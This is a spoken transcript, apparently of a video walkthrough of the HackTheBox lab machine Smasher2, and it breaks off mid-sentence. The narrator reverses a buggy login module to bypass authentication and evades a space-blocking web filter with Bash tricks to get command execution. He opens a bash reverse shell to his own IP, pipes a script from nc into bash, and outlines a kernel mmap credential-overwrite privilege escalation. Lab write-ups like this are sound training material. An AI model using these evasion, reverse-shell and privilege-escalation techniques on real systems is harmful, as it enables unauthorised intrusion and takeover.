What's going on YouTube? This is IppSec. I'm doing Smasher2 from HackTheBox, and as far as the web shell goes, I'm only going to be covering the unintended way, which is a bug in the code that lets you pretty much just bypass the password. I know a lot of people want me to cover the intended way, which is dereferencing a garbage collection method in CPython, I believe, but I spent a good 10 hours trying to understand it in a way that I can explain it, and every time I thought I understood it, something happened that just made me question everything. So instead of spending an large amount of time trying to come up with that, I'm just going to skip it because we have a way to bypass it, and maybe we'll come back to it in another video. But once you get past the login prompt, we do a pretty cool web filter evasion technique to get a shell on the box, and then with that shell there is a kernel module that allows you to exploit memory mapping in the kernel space to the user space to overwrite a credential structure to make your process run as root. So with all that being said, let's just jump into the box. As always, we start off with the Nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the Nmap directory and call it Smasher2, and then the IP address, which is 10.10.10.135. Can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and its banner tells us it's a Ubuntu box. Then we have DNS on port 53, and its banner tells us the server hosting DNS is ISC bind, and also that it is on TCP, which isn't all that uncommon. The one main difference between DNS on TCP than UDP is that TCP is capable of doing zone transfers, so it's just something you should always test when you see this. Chances are it won't allow you out in the wild, but sometimes you get lucky. Then finally we have HTTP on port 80, and its banner tells us it's Apache HTTPD and also that it's Ubuntu, and the title is a 403 forbidden. So let's just go take a look at this HTTP page real quick because it's a quick check. So 10.10.10.135, and we don't look like we get a forbidden page. Let's just try a few directories like /robots.txt, and we get not found. This looks like a 404. So what I'm going to do is go to Foxy Proxy, enable burp suite, refresh this page, go to proxy, send it to repeater so I can see this request, and it is indeed a 200 request. So whenever I see something that doesn't really make sense because Nmap's telling me this is a 403 forbidden, I want to check it out because this may be a key thing on why a tool doesn't work. So say this isn't working because of some type of dirty word filter around the user agent, and I don't know that, and then I run GoBuster against that, and then GoBuster keeps getting 403s when it shouldn't. So always try to figure out exactly what's going on in these type of situations. So nmap-sc-sv-p80 for port 80, 10.10.10.135. Wireshark is listening, so now when I click go, we can analyze what Nmap is doing. So I'm just going to say HTTP, and then let's examine a packet. So right-click, follow, TCP stream, and that hotkey is Control-Shift-T for future reference. So looks like our GET request does get a 200. We don't have anything else in our header. So let's close this out and then look at another HTTP packet. So let's go to post. Let's see. This one looks like it has some more data. So let's go to follow, TCP stream. And I'm not exactly sure what this is doing here, but the server responds with a forbidden 403. So I'm not sure exactly what that one was about. Let's try to find another blank request. So here's a GET request on HTTP 1/1. Interesting enough, the very first one was 1/0. We do follow stream, and here we are getting a forbidden. And we changed this 1.0 to a 1.1 and added all these strings. Most importantly, we added this user agent, and that's generally where you're going to find filtering around. So let's go back to burp. First, if we change 1.0, 200 OK, 1.1, 200 OK, nothing there. So let's take our user agent out and put our Nmap1 in, and we get a 403 forbidden. So let's try to figure out exactly why this is blocking us. So I'm going to put the user agent to nmap with a capital N and lowercase n to see if it's based around the word nmap, and it's not. So let's take this Mozilla out to see if it's based around a whole user agent. Doesn't look like it is. We still get forbidden. Take out the compatible. We get forbidden. Take out nmap. And we get a 200 OK. So let's start taking off from here. Click send. Forbidden. 200 OK. Take this with just nmap and engine. So it looks like there is a blacklist around Nmap scripting engine. Nothing too interesting, just, I guess, keep something in mind whenever you run something. Make sure user agents are up to par. So I'm going to copy this user agent out because the next step is to run GoBuster, and I should just use a user agent. I know that works. So GoBuster dir -u URL HTTP 10.10.10.135 -w word list user share word list dirbuster directory list 2.3 medium, and then we want to do, what is it? I think probably -a, but I'm just going to double check. dir-h that's dirbuster GoBuster dir-h. And we see -a is the user agent string. So -a, and it copied that. So let's just delete this. Go back here and copy this. Paste. Okay. And then -o for out file. I'm going to call this GoBuster root.out. There we go. So GoBuster is running. While that runs, let's check out a zone transfer. So syntax for that is dig axfr, which means zone transfer. Dig is just a DNS client. Then at the name server, so 10.10.10.135, this is the server that's hosting DNS. And then you got to give it the zone. So the zone, you just had to guess this one because the box is called Smasher2 on HackTheBox. You just do Smasher2.htb and it dumps the whole Smasher2.htb zone. If you just did HTB, it doesn't work. So you need that Smasher2. So we get one new host name out of this, so domain name. It's wonderfulsessionmanager.smasher2.htb. So let's copy this, go into a host file, and paste it. So 10.10.10.135. And I'm also going to do Smasher2.htb. So let's ping that to make sure that now resolves. It does. So let's turn Foxy Proxy off and just go to like Smasher2.htb. We get the Apache page. And if we go to wonderfulsessionmanager.smasher2.htb, we get a actual website. So I'm just looking down to see if there's any information. We get some potential usernames to try. John McCaffrey, Robert Anderson, Ali Sanders. But nothing too special. Looking at all these links, I'm just looking at the bottom left of my screen and everything's going to /# except login. So try now for the next login manager. Let's try admin. Click login. We get authentication failed. Guest. Try login. Failed again. So got something here. We can try SQL injection. So or 1 = 1. And whenever I use SQL injection, doing count that probably exists, like admin, and we just get error. So if we do password, then single tick, we get false. I wonder if I can go here real quick and unmask this. This will be easier for you to follow. Let's see, type. There we go. There we go. Now we can go with this. So, or 1 equals 1 actually aired out. So if we do like this, error again, error. So test space test. I'm trying to figure out exactly what is causing the error message. And it looks like the password can't have a space. So that is definitely interesting. Try admin password, click login, and nothing really interesting with this login form. So let's go take a look at our GoBuster, and we see /backup. So let's go to this /backup. Whoops. And URL is not found because GoBuster is running off 10.10.10.135. So here we go. And there are 2 files. So we can do save link as and save link as. And then let's move those 2 files into a directory, make dir HTTP. And then let's just go in there, cp downloads /dir here. And I guess I can clean my downloads folder, so let's just remove them. There are 2 files, one Python, one C library. So if we do file ses.so, it is an ELF, but if we look at auth.py, we have a Python file. And it looks like it is a Flask web application, which is a web framework in Python. But this very first import statement, import ses, this is going to import the ses.so and load a bunch of functions from this. This is a C Python thing, which is Python code calling C code. So all the functions we have here probably aren't going to be all the ones we actually have access to, because some of them will be coming from the C file. So one of the first things I want to do, I guess we can kill this GoBuster, but I want to open the ses.so file up in Ghidra. So just do Ghidra run, and this will show us all the functions we have total. So let's make a directory actually called Ghidra, and then file new project, and the Ghidra ses.so. Open up the decompiler, and then press I to import, and then we want to go to root. Where's HTTP? Root again. Run. Root. HTTP. Boxes. Smasher2. HTTP boxes Smasher2, HTTP ses.so. No file system provider. File, import file. Root, HTTP boxes Smasher2, HTTP. There we go. I'm not sure what hotkey I was in earlier, but we're good now. So let's analyze the function. And while that runs, I guess we can go back to this Python code. So let's see. I'm going to grep for def on this real quick. Grep def auth.py to see all the functions we have. And the one I'm probably most interested in is maybe log_creds. So log creds. And it's saying with open creds.log, write login from, I guess, use IP address, and then username password. So I want to definitely check out creds.log. So let's try creds.log. And I'm in burp suite, so let's turn off. We get a forbidden, so we can't open that file. If we go to 10.10.10.135 creds.log, we get a forbidden as well. So can't access this file. This file's name itself is auth.py, and I want to go down this rabbit hole because, well, I got a forbidden on 10.10.10.135 for creds.log, and a forbidden on this DNS name as well. So if we try auth.py, we get not found, and auth.py here, we get not found as well. I'm going to try to go into this directory, just a long shot, not found. If I go to like robots, which probably, let's go to backup/creds.log, forbidden. So anything that ends in creds.log is going to be forbidden. So that's why we had that data, or that result. It's not because we actually got to read the file, or could have read the file if we had permission. It's just Apache or whatever is configured to block any access to the file creds.log. So let's see, git manager and init manager. We don't have any like login request here in auth.py. So I'm just going to search for login, and we get login redacted redacted. If we had read auth.py, we could have pulled the server, the version that's not at a backup, and maybe got in. Let's see, ses.session manager login craft token. So right here, this is calling, whoa, did not mean to delete it, the C file, the ses.so, and then session manager, and then doing login. So going down, we can check for more logins. So route is /auth. It's a post request. And if we analyze this post request, so admin, and we can send this to burp suite, go here, log in, send to repeater, click go, but we can see exactly what it's sending. So action is equal to auth, and then sending a data, I guess that's a, drawing a blank on what type of variable this is in Python, but anyways, it's sending a username and password as well. So that's probably what this request.getJSON is. Dictionary. It's sending a dictionary. So temp login is equal to the contents of data. And then what it's doing with temp login, it's going to try temp user login. And temp user login, is this a variable? User login is not none, log creds. So this looks like it's a function within this C thing. So let's go take a look at the C code. And if you can't tell, before this box, I've never used C Python. So that's why this whole section's probably iffy on benefit. But looking at the session manager thing, we have a check login function. And here we have manager.checkLogin. So this is what we want. I don't know why we called this temp login. I'm not exactly sure what the benefit of that is. Data, if, yeah, so we're calling check login and we're passing it the entire web request, which includes this action auth. So this temp login confused me. I was like, why are they, yeah, I don't know. Just weird, but the passing this entire line to that C program, check login. So this is where we want to start. And I just have Ghidra split, so I have assembly in this tab and decompiled in this tab. You just like click the window and drag it over to break it out. The reason why I did this mainly is because I increased the font size, so it looks really horrible splitting these two. But whenever you go into the decompiled output, it's very intimidating at first, but less intimidating than looking at the assembly. And the benefit to the decompiled is you can go through and label things. So let's go and take a stab at this. And this is big help from not SnowScan, but let's pull up the blog post real quick, because I'm doing this box after it got retired. I had the benefit of reading write-ups, and this one was a big handy to me because he kind of did what I'm going to do here and rename a bunch of variables. So, and it just shows how easy this makes it. So the very first thing, we have this, whoops, don't want to go there. Let's go back to functions. Session manager, check login. Reanalyze. Let's see. Come on. I hit Control Z and then it undid the analysis. So that's why I'm analyzing it again. Check login. Okay. So right off the bat, it's doing this pyarg parse tuple. So what we can do is go pyarg parse tuple and see exactly what this looks like. And this is not great being the size the text is. Let's see. So 3, where's the calling function? Maybe a different page. If you read this whole thing, you would see exactly how it's used. You do pyarg parse tuple, and then the argument, and I want to say format is next, and the format is these ASCII characters. So I'm seeing pyarg parse tuple, param2, this is the argument, this is the one we passed here. I'm going to guess param1 is probably going to be action equals auth. Oh no, I don't know exactly what param1 is, but param2 is probably going to be all this HTTP data. So I'm going to press L to rename this, and then I'm just going to put raw HTTP post data. So the next thing is the format, and it's pointed right now to just an address. So if I double click this and then go into the assembly output, we can highlight this because it doesn't know what type of variable this is. So we can just say, hey, the data type is going to be a string, and now it is O's, which this will fit the calling convention. As you see, the format here, store a Python object in a C object pointer. So then we get the next two, and we don't know exactly what these are. So local 68, not sure, just going through. So right here we have cvar2 dict contains local 68 and then this dat. So let's double check this dat again by double clicking it. And again, it couldn't tell this was a string, so let's just help the decompiler out by saying it's a string. Going back here, so now dict contains data, and if we look at the post request, it's checking if this is here. So this has to be the exact HTTP post request. So this will be, let's just call this data, because it's checking if this exists. Actually, let's call this post data, because just data would be this. We're calling the entire string post data. So the next thing, local 70, we can see where this is used, and this is checking is blocked, can log in, set unblock. So a bunch of things around what are probably credentials. So I'm just going to call this one data. So right now I'm taking a leap of faith. I wonder if I can do data maybe. Right now I'm just taking a leap of faith that that is only this. That's why I have the maybe. I don't know if I can do question mark. Yep, I can. So let's keep going back down. cvar2. So this cvar2 looks like it's always being used for some type of Boolean check. So this one right here is being if data is in this variable. Down here is checking if the user is blocked. So I'm just going to call this Boolean check. And then we can keep going down, missing data parameter, and that's jumping to this function. Going down here, we can just see subroutine doesn't return and it crashes. Or not crash, but exits. So oddly enough, you can't just hit L here to rename this. You have to go into the assembly, and then we can rename this to exit. So now the decompiled shows it as exit. And let's see. This Boolean check, I'm going to do a semicolon to put a comment. And this is checking for data parameter. I'm just going to copy this because we're going to apply it to a few things. So this next piece is right here. Let's see. Long. So ivar2, this looks like it's going to be a counter. So right here, it's checking for the number of arguments. So we can just put count number of args. And now this checking for dict. So just going through and commenting this decompiled. And right here, it looks like this is where we begin. So begin login. And again, that's semicolon to get into the comments. So this local 58, don't save. This is actually going to be data. I keep hitting semicolon because I was in comment mode. But this is data because this is just getting the dictionary key data out of post data. So not exactly sure what this one was, but we know it is going to be potentially the session manager because this has credentials and everything. So if is blocked, the session object, no, now we're checking can log in. So counter again, it's getting the login count for the user. If it's less than 10, set the last login. Whoops. Let's just do, here to go back. This is checking if username exists. So check if username exists in data. Copy, because we have one for password. Okay. So now we're assigning usernames. So assigning username PW. So looking at these 4 lines, we're getting username out of data and password out of data. And then we're converting them to strings. So I'm going to call this username raw. And then this one will be password raw. This will be username. And this will be password. Okay, and now we're getting internal user, and then getting internal password, and then comparing the password. And this is going to else, I'm guessing this is if login count's greater than 10, set it to blocked. But right here is interesting. So let's check the get internal user and see exactly how this works. So double click there. We're passing it a parameter. We know the parameter is going to be credentials. We're not passing it the username. We're passing it the whole parameter, I believe. So if we go back to check login, scroll down. Yeah, get internal user session manager. So it's a bit odd to do it this way because we just defined the username here, but we're passing it the whole object into this get internal user thing. So that's why I called it credentials. So p1 var is equal to credentials user login. So let's call this, I don't know what that one is. So get list item. So this will be credentials 0. Whoops, I'm in comment mode. L credentials 0. And I'm calling it 0 because it's getting the item, and this will be creds. It's getting the item out of this, and it's getting 0. I'm guessing creds 1 will be the password because we passed it the whole object. And then returning credential 0. So let's go back here. And then missing username, get internal user, return credential 0. This is session manager. Zero. And then let's go look at the get internal password and do the same exact thing. So param1, whoops, is going to be credentials. And then we can call this creds. Why do I keep hitting L, semicolon? L creds. And again, this is doing the same exact thing and doing credentials 0. So both of these functions are returning the username because this object is most likely going to be 1 for the password. And if you wanted to double check this at this point, we can always load this up in GDB and validate. But if this is true, then we don't have to brute force the password. We just have to brute force the username because the password is going to be the username. And this was a mistake, not the intended route, an actual mistake in the program. The intended way is through a dereferencing garbage collect thing that I'm not confident explaining. So most likely I won't explain it. That's why we're going out through this route. But the step to GDB is, let's open up Python. And this, I think, has to be Python 2, because if I did Python 3 and did import ses, we get a error message. So I think this program is meant for Python 2. So let's import ses. And then what I want to do is look at everything else in auth.py to see things we need to import. We don't want to import Flask because I don't have that installed, but I want hashlib. We probably want hmac. Maybe OS. Base 64. That should be good. So let's get these two functions, the craft secure token and other thing. So I'm just going to cat this now. Less. Can we just paste this in? So copy, paste. Sweet. So let's see. Where is login? Here it is. we have login equals redacted redacted, and then we're creating the session manager object. So I'm just going to not copy it just yet, but we can do login is equal to IppSec and please subscribe. And then let's do ses.session manager. I'm just going to copy and paste. Copy this and paste. And this has to equal something, so we'll do s equals. And now the next thing we do is create a data payload. This is the HTTP post request. So we'll do creds is equal to username IppSec and password please subscribe. So if we look at creds, that's what it looks like. That looks good. And then D is equal to data and creds. Let's look at D. That looks fine. And again, we're doing this because of this. So we could have done this action auth thing, but script's not using it. It just cares about data. So that's what we did. So let's see. Now we can do s.checkLogin and we'll do D. And we can see false. If you don't look at everything you can do dirs and you can see all the options you have. Check login is the interesting one. So with that, we can go into GDB and debug this. So ps-ef grep for Python gdb-p 7792. And what we want to do is set a breakpoint. So I'm going to break on, we want to look at the output of this. We'll do both. We'll do get internal pwd and get, what was the other one? Username. So scroll down. Let's see. User, so get internal USR and get internal pwd. So get internal USR and pwd. So we set those two breakpoints and we can continue. We run check login. And if I maximize this, go all the way to the top, it'll say we hit breakpoint 1. Not sure what says that, but we should have hit breakpoint 1. Let's see, where can we verify this? USR. We'll just keep going. It's weird not having my... Oh, we segfaulted. That shouldn't have happened. Python. I'm just going to pause the video and retype everything to get our session back. Maybe we screwed up something. So I typed out pretty much everything I did before, except I left two things in. We can get rid of this flask and whatnot. So if we cat test.py, we can just copy this into a Python interpreter. So copy it in there. And we can do s.checkLogin D. Okay. So now let's quit GDB. Do this PS again. GDB-P 7832. And break get internal USR and pwd. Continue. s.checkLogin. Okay. This time it broke correctly. So we see reason breakpoint. I think it said sigsev here before, so I should have caught that. But anyways, we see it stopped on the breakpoint, and the function we're in is get internal user. So we can just step through this, and you can look at the registers as it goes. The key thing here being all the registers. And GDB or GEF or Jeff will kind of help this, but remember the calling convention of 64-bit registers and that means that RAX is going to be the output of whenever you call a command or function or whatnot, and then the arguments when you do a call go in the order of RDI, RSI, RDX, RCX, R8, and R9. So you just really have to remember probably 3, RDI, RSI, and RDX, and then remember RAX will be the output of calls. So you can look at what the register looks like now, nothing too interesting, but once we start moving through, things should start making sense. So let's see, where are we now? I want to get to this call. So I'm going to do S3 and then go one more. So we're at this call py object get attribute string, and if we go back here and look at let's see, get internal USR, this is exactly where we are. Then after that we'll get item and other things, but this is in the code. If we go here, let's see, call, if you look at before, move RDI RAX and then a load effective address, move credentials, so RDI is going to be a credentials object, and lo and behold, that is the very first argument when you call something. So that makes sense. And then before that is LEA, load effective address, but yep. So if we look at the second argument, which RSI is the second argument. So if we do x/s RSI, you can see user login. So I'm not going to go into this. Instead, I'm just going to do n to hop over this, and then I'm going to check out what RAX is. So x/x s RAX, it's just 3. I'm not exactly sure what it's doing here, but if we go a few more times, we get this get item. So if we look at that, we're right here. We can step over this. It's now set to 2. And then we got a py string. So this is getting the string. So n. And we get IppSec. So we finally got through here. It parsed all this and grabbed the username out of the credential object. And that's exactly what we expected. So if we do C to continue, we're going to hit breakpoint again. But this time we're in breakpoint 2, which is get internal PWD. So I'm just going to do x/50i to look at the next 50 instructions, maybe 25i. Specify our starting point, which is RIP. There we go. So what I wanted to do was just skip all this and go straight to here. And I'm not exactly sure what x/50i was looking at when I didn't specify anything, but when I specified RIP, that says, hey, use my current starting point as the point of entry. So let's see. Short down to 20. Okay. Yeah, I wanted to go straight to here. So I'm just going to copy this, break, star, paste the address, continue, and we'll hit another breakpoint. And let's see, this is calling the pystring thing. So I'm just going to hit N to go next, to hop over this call, and then we'll examine RAX. So x/s, RAX, and that's IppSec. So that is it, getting IppSec for both the username and password. I'm sure if we step through this a bunch more, maybe if I just do 10 next, or next 10, let's go SI, and then return back into check login. Whoops. Let's do x/50i RIP. Look at the next 50 things that are interesting. So we started here. So let's see. we're doing a call to string compare here. So let's break and see exactly what it compares. So copy this, b star paste. Is there anything else we want to look at? Calling something, check login. And let's just look at this string compare. So continue, and let's see, doing a comparison, and not sure exactly why RDI is here as please subscribe, but it's comparing RSI and RDX. At least I think it is. So the easiest way to figure this out is to hit N for next and then look at the return value in RAX. If it's 0, then it compared RSI and RDX. If it's 1, it compared RDI and RSI, and I have no idea what's going on in this program anymore. And if it returns 2, well, then just something failed magnificently. So let's just do N, and let's look at what RAX is. So x/s RAX. Probably need like I or something. RAX. That did not return what I thought it would. I was hoping it would return the thing. So maybe everything in this video you can ignore because my understanding of this has just went out the window. EAX. So x/I EAX, x/s EAX. Let's see. It's taken reason Z. So I'm guessing we took a jump right after that. And let's see. Where are we? Return session, compare this. So I think we got to here. And we took it. So I think that's good. And this could also just be because we're not running this on the server. But yeah, I am utterly confused. I'm going to try this one last time, and we'll see if we get it. So where are we now? Breakpoint, get internal password. We can do next. Info B. I do have another breakpoint. That's on the check login. So we broke on this string compare. So if I hit N, this RAX is going to go crazy. So let's do S, and then we'll jump here. Oh, we're in string compare now. x/10i. S5. Okay, let's continue. Do this again. Continue. We're here in string compare. So I want to break right here. So if I do continue, we did not hit that breakpoint. Okay. So now we're here. x/x RAX 50. So N can't access memory. I'm not exactly sure why that's happening. I'm guessing string compare is putting in a different register than I'm expecting. But that'll be the end of me flailing around in GDB, but hopefully you picked up something and maybe you can use GDB in combination with this decompiled output to kind of get an idea of what variables should be. Because you can always just set a breakpoint on like get dict key and then analyze where you should be. So we'll just do that and then call it it for this. And hopefully this is successful because I have not been having luck with disassembling this today. So del 1, 2, 3, 4. So you could just set a breakpoint on get dict key and then continue, and it's seg faulted. I'm not sure what's going on, but I'm done with GDB for today. So sorry about that. Hopefully you pick something up. If not, then oh well. So with all this being said, we know that if the username and password are the same, we'll be able to log in. So we already tried admin, and we get too many tentatives, wait 2 minutes. So I'm locked out. So maybe that's what happened with that seg fault, is I got locked out, and that's why the application seg faulted, because it didn't know how to handle it. So I'm going to wait 2 minutes like it says, and then we will continue on with the video. So it's been the 2 minutes, and I tried again, and we got an error message. So I'm going to try a different user. Let's try guest. And the reason why it has a lockout is the garbage collection dereferencing intended way. You're actually supposed to exploit the lockout, and upon the final failed attempt, you trigger an exploit. But that is really complicated, and I don't fully understand it. So just trying various usernames with the same exact password, do administrator with a capital A, you get a API key. So now we got a new endpoint that we can access, API/API key/job, and this is the key. So if we go back into our code, and then we just search for like API. Let's see. Whoops. Let's search for API. We get the secret token. This is on login. So that's not what we want. Here we go. App route /API/the key job. It is a post request. So let us put this in a new tab. So we want to do API/key/job. And we have it as a post. So let's see what it wants. So it's saying request.getJSON. And let's see, if data, type data is dict. If schedule is in data, then we do out is equal to data schedule. So just like the login, we can do action. This doesn't really matter because it's only checking data. And what it wanted was schedule. Okay. And we can do echo test. Click send. Missing schedule parameter. SCHEDULE. So let's see. SCHEDULE. Thought I had that right. Maybe. Where am I? So let's see. What is it looking for? Oh, I see. It's not actually looking for the data piece. This is the post request, and this is the variable. So if I get rid of this, action data, just reusing variable names confusing me. But if we look at this, click send, there we go. We have command execution. So if you look at the login, we can potentially see the difference. So let's see. return authenticated data. So right here is what it did before while we had the nested data. So we see data and then dict data and getting the data value. So that's why on login you have this data value, because the dictionary is getting that. If you go back to the API endpoint, it is not. Where is that? JSON data schedule. So again, just slight confusion because of variable names. But now that we have code execution, we can move on and try to pop the box. So let's see. The very first thing we'd always do is try to get the reverse shell. So 10, 10, 14. I'm probably 3. 9001, 0, and 1. So if I go open a new thing, nclvmp 9001, let's ifconfig ton 0, 10, 10, 14, 2. My IP's changed since I last did this. Okay. Click send, and we get a forbidden. So it looks like there's some type of web filter. So let's try echo test, and then click send. And we get a forbidden. So let's find out which of these words is blacklisted. So let's get rid of test and just do echo, and we get success true. If we just put in test, we get a internal server error, which is different than what we got before, which was a 403 forbidden. So it looks like maybe the web filter just doesn't like spaces. So we can try just doing o space test, and we get a forbidden. So of course, if we do echo IppSec, it is also a forbidden. So it definitely does not like spaces. And before we continue, I just want to highlight one thing because I'm going to start using it from here on. If you go to options miscellaneous and scroll down to issue repeater request, there's a hotkey to issue this. So if control space isn't working for you, go in this setting and set it. So then whenever you press control space, it issues the request. So the next thing I'm going to do is take advantage of Bash's auto expansion. And that's by putting this all in brackets and then using commas where I want spaces. And we can get around that filter. So what this is doing is just taking advantage of Bash doing the processing before it sends it. So if you do echo IppSec, it just echoes that. You can also use variables that are defaulted to space. So like IFS, the internal field separator, its default is a space, and you can see it working like that. Additionally, like star, that's not going to be sent to like the kernel with star. What Bash is going to do is go pull every file or item in your current working directory and then send that. So that's why if you have too many files in wherever you're working and you use star, Bash will warn you. Additionally, that is why like we had a file called I think -n. So if you do ls and now I do ls star, it's, I mean, echo star. Maybe it didn't work that way. Ignore that train of thought. I think -n has to be at the very beginning. If we do ls star and then we touch -la and do ls star, we can see the output was different because it ran ls a bunch of the files. Like if we do ls Ghidra GoBuster and add -la anywhere, it accepts that as arguments. So that's why it worked with ls but not echo. So, and that double dash, all that means is don't process anything as an argument. So that's why I'm deleting it that way. So with that being said, there's two other things you can do. You can put blank things. So like, whoops, I probably should have done please subscribe. Double quotes work. escapes will also break it, because a single backslash is just an escape. So you're escaping something that does nothing, which means you didn't really escape anything. So there are ways to get around that. Also, you can use like question mark. I thought you could use that question mark. Maybe echo's not one you can. Who am I? Huh. I thought I could have done that. Ignore that then. Maybe I'm thinking something else. But with all that filtering in our heads, we can now probably do this box. So we want to do a base 64 operation on this. Click send, or control space, and we get forbidden. So let's just break base 64 up, and we can. So this is important because now we can base 64 things. So what we can do is go back and do a bash reverse shell. So TCP 10.10.14.2 9001 0 and 1 is a reverse shell. So we can, oh, I don't have to copy this yet. We want to echo this. And I just want to make sure the syntax is correct. It is. So what I'm going to do, base 64 this, and then we can go back into this and echo the base 64. And then we try a base 64 -d. And remember, we can't use spaces, so we do it this way. Whoops, that's -s, -d. Forbidden. Didn't like the -d, so let's separate the dash and the d, and we get this. So this is a command. So the next thing we can do is bash. So if I do that nc command again and send this, we don't get a response back because we got our shell. So now we're a low privilege shell on this box. So we can do two things. We can either drop an SSH key or upgrade a shell with the python-c import pty. I'm just going to drop a SSH key. So if we go cd to home, make dir.ssh, cd.ssh, and in this window, let's do, is it keygen? SSH-keygen. That's it. Generating key. Let's just save it in here. Call this Smasher2. No passphrase, ls, and we can cat Smasher2.pub. Copy this. And then v authorized keys. Paste. Did I actually do that correctly? Did that work? If it didn't work, then we can redo it, but it looks like it did. I was questioning it because Vim aired out saying like the weird terminal thing. So now chmod 600, Smasher2 for the private key, chmod 600 on authorized keys, SSH-I DZONERZY at 10.10.10.135. And we have to specify the key name and see if this works. There we go. So now we got a SSH prompt. So I'm just going to exit this, and we have a legitimate shell on this box. So let's try to privesc. The first thing I always do, check sudo. It asks for a password. We actually don't know his password. So let's move on. We can go into smanager and look at auth.py for that login command. And try this password, administrator, and this was administrator's actual password, super secret admin password 123 bang. So we can try this for the user to see if there's a password reuse type of thing going on. And it's not there. We can try it for root. And we can try checking for other users on the box. And it doesn't really look like any. So The next step probably is to run LinPEAS, Linux Privilege Escalation Awesome Suite, I believe is what it stands for. So ls opt, Privilege Escalation Awesome Script Suite, and go here, nc lvnp 9001, and we can just curl 10.10.14.2, 9000, oh wait, we don't curl, we nc 10.10.14.2, 9001, and pipe that output to bash. And I forgot to do that. So let's copy this, paste, and now it is running the script. I think it's done now. We'll see. But we can go back and look for a pipe bash command and then just go down this list. So let's see, we can do ping and nc for network discovery. Well, it's only one box, so we don't care about that. Looking at the path, nothing too interesting right now. Maybe if we have a set UID binary, we could exploit that, but ignore the path. Looking for a signature verification in dmessage, and we see this. So what this message is saying is, hey, there's a kernel module that is not signed installed, and that module is DHID. So definitely probably should take notes of that. So let's paste this. And then I'll go over a few things we'll look at, but that's the main thing we want to hone in on. I never want to go away from looking at the analysis so quickly, though. I always at least want to see like the process is running and things like that. And you can see this privesc script is awesome because it highlights the colors of users. So that's really cool. Cron jobs, outdated versions. Let's see, active ports, localhost 5000. So that's probably just going to be the Python script. 953. I don't know what that one is. Maybe the WAF. I don't see. Oh, there's 80. So now I was saying the Python's probably here. Maybe something's there. Once we get root, we can see everything. But port 80 is probably the Apache with the web filter that directs you to port 5000. So that's probably what that is. So users, highlights important users, but enough of going through this. I guess one thing we can look at real quick is the Apache configuration, if we can. Let's see, cd sites available, cat custom, so 5000 is the Python, grep-r 953, I think it was, SSLNP, let's do SSLNP-T for TCP. SS is just a new version of netcat, and it was 953. So I don't think Apache is directing anything here because I searched all configs for it. We could try grep-r 953. Bunch of weird stuff in SSH, but not exactly sure what 953 is. But let's move on to this kernel module validation failed. So DHID. So do we have access to the locate command? Locate DHID. And we can get to that kernel module. So let's download this and analyze it. So go back here. We can do scp-i Smasher2 dzon erzy at 10.10.10.135. Paste. And now we have the module. So we can go back into Ghidra. Close that. We don't care about saving that. Open a new session. I to import, and we want to go up one directory. Man, it did not like me typing that. Dot dot, there we go. DHID.ko, click OK, analyze it, analyze, OK, and then we can go into functions and look at things we have. So we got a few device things, so dev mmap, open, read, and release. So if we look at read, it's going to copy something to the user, and it's going to say this is the right way, please exploit this. If we look at open, let's see what device it is. Does this say device? Let's see, print K, look at this, go back into the assembly. This is saying the device has been opened digit times or integer. Let's see, device create. Do we not have code for this? Init module. Let's look at init module and look at this. So this is where it's getting initialized. So we have register device. We can look at this. And that is DHID. So we can say that. I wonder if we say this is string. We probably want to say it's a struct. I'm not sure what that did. Okay, that's fine. So register device, and looking through this, let's see, print device create. So we could look at this command because this is just C. So if we look at device create and see this, the final thing is going to be the device name, I think. Yep, the string for the device's name. So we can look at everything about this device, but we know it is DHID. So if we go back here, we do ls/dev DHID, there is a device there, and that is registered to this kernel module. If we try catting it to view the contents, weird stuff's going to happen. It's just going to output T's, and I'm trying to kill it now with Control-C. But it filled up my buffer, so it takes a little while. So what we should do is create a program to read this. And the easiest way is to go over just what SnowScan did, so we're not typing everything ourselves. But I really like how he approached this. So instead of reinventing the wheel and typing C, I'm gonna highlight something cool he did. DHID, that's what he's talking about. Right here. So copy his code, v read.c, paste, and we can go over this, just including standard libraries, defining the buffer length. This is going to be the amount of data we read, which is 256. So start off by initializing the ret, which is probably return value, and fd, which is file descriptor, opening dev DHID for read and write. And if this fails, print the error message, and then upon success, read the response from the local kernel module. If it can't read the message, print fail, and then print the message. So super simple. Let's do gcc-o read.c and execute read. And we can just see we go through and the kernel read the device, which is pre-programmed to this. So the next part is exploiting mmap. So the first thing probably to do is go and Google what the heck mmap is. So if you search for this and read the wiki, you can see it's a POSIX compliant Unix system call that maps a file or device in memory map. So it stands for memory map. And because this is running in the kernel, and we may have access to perform this function through the DHID block device, we may be able to map device within the kernel to our user space and then edit it. So that's kind of what the exploit is. And this, again, is going pretty much beyond me because I hadn't done this before this box. But if you search for like exploit kernel Nmap, maybe driver as well. Oh no, exploit kernel mmap. We see this labs.fsecure thing, which I thought was it. Maybe it's not. I'm going to say driver, and let's just put the PDF. That's what we want. This is a really good article that goes over everything. The article also has exploit code in it, which we're going to take. I think it's right here. Let's see. It's working through the exploit little by little. So let's see what we can do. Well, the key thing to being able to map this memory is Linux creates a credential structure. And if you Google GitHub Linux creds.c, this should go to the file within the kernel on Torvald's GitHub, but this is the structure for a credential structure. Every process has this, and it maps out what the UID, GID, set UID, or super UIDs, whatever these are. Maps out all of this. And the theory that we're going to be doing is we're going to be searching for this structure within memory, because all it's going to be is a bunch of, well, our UID is probably 1,000 because we're the first user. So yes, our UID and GID is 1,000. So we're going to search for a credential structure that has everything set to 1,000. So we're searching for 1,000, 1,000, 1,000, 1,000, 1,000, 1,000, 1,000, and then the secure random bits, which I believe is just 4 random bits. But we're going to search for this in memory, and when we find it, we're going to replace the 1,000 with zeros to say, hey, we are root. So we're just replacing the credential structure. That's kind of what this is about. So the first step to do is create code to create a huge memory map, and that's what this is doing. So we can test this out. So let's copy this and step through it. So v exploit.c, I guess. Set paste. Oh, that's ugly. I do not like how that's copying. Let's see. I guess we can just go type it. That's annoying. Copy this there. And let's see. What I want to do, let's copy read.c to exploit.c. I just wanted to keep all the headers. And then let's try copying this out of here one more time. Copy. Paste. %s, semicolon, semicolon, /r/n. It's less typing. So let's see. Int main. Oh, and Vim's going to be annoying. This is going to be a pain. I'm just going to pause the video and get this typed out so we can resume. So I got this beginning piece typed out. The key thing is I did change all my includes, so make sure if you're typing this out, you update all that. And I switched it to my host OS so I have syntax highlighting. So all this is doing is getting the PID of the current process, opening a device, and this device is not going to be the MWR device. This is going to be DHID. And then if it fails to open, return 0. If it is, then print OK and print the file 